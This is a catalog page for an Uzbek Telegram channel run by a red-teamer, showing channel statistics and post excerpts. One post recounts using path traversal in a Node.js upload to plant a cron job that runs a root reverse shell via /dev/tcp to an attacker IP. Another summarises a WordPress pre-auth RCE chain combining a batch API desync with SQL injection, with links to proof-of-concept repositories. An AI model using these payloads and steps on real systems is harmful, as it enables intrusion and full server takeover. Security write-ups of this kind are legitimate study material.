tgindex
JavaSec
@javasecузбекский

Bu yerda faqatgina cyber security haqida emas, shunchaki Owner o'zining fikri va tajribasini ulashib boradi About: Team Lead @TuranSecurity | Red-teamer (CPTS, CWEE,CAPE)|CVE 2x Nvidia, 1x Dolibarr | 2x 0day from ZDI | CTF player | Thoughts & life

Последний пост
12 авг.
Последнее чтение
15 авг.
Постов за неделю
4
Всего постов
24
Тип
открытый
Язык
узбекский
В каталоге с
12 авг.
Подписчики
426
+4 за 3 дн.
Сутки
0
0,00%
Неделя
 
Месяц
 
Просмотров на пост
704
24 постов
Вовлечённость
165,3%
к подписчикам
Постов в день
0,6
всего 24
Упоминаний
3
каналов
Охват размещения
оценка
1/24сутки в ленте
208
1/48двое суток
238
1/72трое суток
257

Оценка по просмотрам недавних постов: пост набирает почти всё за первые сутки.

Посты

  • Node.js. Webshell befoyda. Lekin...👀 Path traversal orqali RCE olish haqida eshitganmisiz? Bug hunting vaqtida unauth upload function topib oldim. Birinchi narsa — stack tekshirdim. Node.js. Demak webshell yuklashni deyarli foydasi yo'q, ko'pchilik shu yerda…

  • 12 авг.8212718

    Node.js. Webshell befoyda. Lekin...👀 Path traversal orqali RCE olish haqida eshitganmisiz? Bug hunting vaqtida unauth upload function topib oldim. Birinchi narsa — stack tekshirdim. Node.js. Demak webshell yuklashni deyarli foydasi yo'q, ko'pchilik shu yerda to'xaydi va keyingisiga o'tadi. Lekin men filename parametriga e'tibor berdim. Odatda bu parametr serverda fayl nomini belgilaydi. Sanitize qilinmagan bo'lsa — path traversal. Tekshirdim: filename=../../../../../../etc/passwd Server 200 OK javob qaytardi. Xato yo'q. Endi asosiy savol — process qaysi user bilan ishlayapti? Agar www-data bo'lsa /etc ga yoza olmayman. Root bo'lsa — boshqa gap. filename=../../../../../../etc/cron.d/backdoor file body'ga esa: * * * * * root bash -i >& /dev/tcp/x.x.x.x/4444 0>&1 Server 200 OK. Yuklandi. Endi faqat cron daemon ishlayaptimi degan savol qoldi — va u ishlayotgandi. Netcat'ni yoqib 60 soniya kutdim. connect to [attacker] from [target] uid=0(root) gid=0(root) groups=0(root) CVE kerak emas. 0day kerak emas. Webshell ham kerak emas. Faqat sanitize qilinmagan bitta parametr va root sifatida ishlaydigan bitta process. Asosiy muammo kod ichida emas — uni kim yozganida edi.🙂 Telegram📱 Linkedin 📱 Web✈️

  • 10 авг.2431из samarbadriddinov

    ✅️ Sababi oddiy: AI agentlarga to'g'ri topshiriq berish va ular yaratgan tizimni boshqarish uchun dastlab o'zingiz "kadr ortida" nimalar bo'layotganini hamda dastur arxitekturasini 100% tushunishingiz kerak. Dasturlash asoslari va tizim mantig'ini bilmasdan turib, AI agentlarini samarali ishlata olmaysiz. Avval poydevorni mustahkam qilib olamiz, keyin esa jarayonni to'liq avtomatlashtirib, tezlikni oshiramiz!

  • 10 авг.22321из samarbadriddinov

    🌙 Hozirgi asosiy fokusimiz va kelgusi Roadmap haqida qisqacha 🎮 Avvalo, asosiy e'tiborni loyihalarni 0 dan AI yordamida ko'tarishga qaratamiz. Bu jarayonda siz shunchaki tayyor koddan foydalanmay, balki tizim arxitekturasini qurish, ma'lumotlar bazasi strukturasini to'g'ri loyihalash va mantiqiy bog'lanishlarni (business logic) mustaqil ravishda ishlab chiqasiz. Shu tariqa butun boshli tizim qanday ishlashini amaliyotda chuqur tushunib olasiz hamda Next.js, NestJS va Telegram Bot yaratishni to'liq o'zlashtirasiz. Keyingi bosqichda esa Claude bo'yicha to'liq kurs taqdim etiladi. U yerda biz sun'iy intellekt agentlari (AI agents) orqali butun boshli loyihalarni avtomatlashtirilgan holda quramiz. 🛌 Nima uchun aynan bunday roadmap? Keyingi postda tushuntirib beraman

  • 7 авг.204112из ayubcyber

    видео или голосовое, без подписи

  • видео или голосовое, без подписи

  • видео или голосовое, без подписи

  • Consistency. Telegram📱 Linkedin 📱 Web✈️

  • видео или голосовое, без подписи

  • 👩‍💻 #web #offense #заметки #события ➡wp2shell — unauth RCE чейн, уязвимы WordPress'ы версий [включительно]: ▪️ 6.9.0 – 6.9.4 (2 декабря – 11 марта 2026) ▪️ 7.0.0 – 7.0.1 (20 мая – 9 июля 2026) ▪️ немного* 6.8.0 – 6.8.5 (*только SQLi)    🔗 Чекер: wp2shell.com    🔗 PoC: github.com/Icex0/wp2shell-poc    🔗 PoC: github.com/0xsha/wp2shell    🔗 PoC: github.com/dinosn/wp2shell-lab    🔗 PoC: github.com/sergiointel/wp2shell-poc ⚡️ ШАГ 1: CVE-2026-63030 0️⃣ POST /wp-json/batch/v1 или POST /?rest_route=/batch/v1 — unauth метод, принимающий целый список подзапросов к API в виде JSON, прим.: { "requests": [ { "path": "/wp/v2/posts" }, { "method": "POST", "path": "/wp/v2/users/me" } ] } 1️⃣ Метод поверяет каждый запрос➡️параллельно собирает 2 массива с результатами: $matches + $validation; Если какой-то запрос не прошёл проверку** wp_parse_url() — массивы $matches + $validation рассинхронизируются➡️один подзапрос может быть выпущен с хендлером другого подзапроса; **Например, такой запрос: GET http://: 2️⃣ Далее рассинхрон поможет сметчить привилегированный хендлер (из $match) + с методом, для которого хочется обойти валидацию; ⚡ *ШАГ 2: CVE-2026-60137 0️⃣ GET /wp/v2/posts/<id> — метод, который после валидации передаёт свои параметры (author_exclude, orderby, per_page, ...) функции get_items(); 1️⃣ author_exclude➡️мапится в WP_Query.author__not_in, который вставляется в SQL запрос; ⬆️ ИТОГ: можем вызвать GET /wp/v2/posts/999999?author_exclude=<payload> [в составе batch-запроса] в обход проверок! ➡Почитать ещё:   ▪️ ‟wp2shell: Pre Authentication RCE in WordPress Core”   ▪️ ‟Exploit brokers pay $500,000 for a WordPress RCE. I found one with GPT5.6 Sol Ultra and $25”   ▪️ ‟wp2shell hits WordPress: detecting pre-auth RCE from plugin drop to command execution”

  • nobody cares. nobody feels bad for you. nobody believes in you. prove to yourself and only yourself. lock in for you, nobody else.

  • 10 июл.7123110

    There is no light for those who don’t know darkness… Peace of cake Telegram📱 Linkedin 📱 Web✈️

  • 8 июл.8462113

    @azim_pulat

  • CWEE, CAPE

  • 3 июл.795473из fikrlog

    Pulim ko’p bo’lsin desangiz: > Onangizga bering.

  • 2 июл.2 02914

    видео или голосовое, без подписи

  • 2 июл.2 03512116

    There is no light for those who don’t know darkness… Peace of cake Telegram📱 Linkedin 📱 Web✈️

  • 2 июл.755171

    Guess what…

  • Вайбкодинг. День 2

  • Muxumi tajriba…

JavaSec — tgindex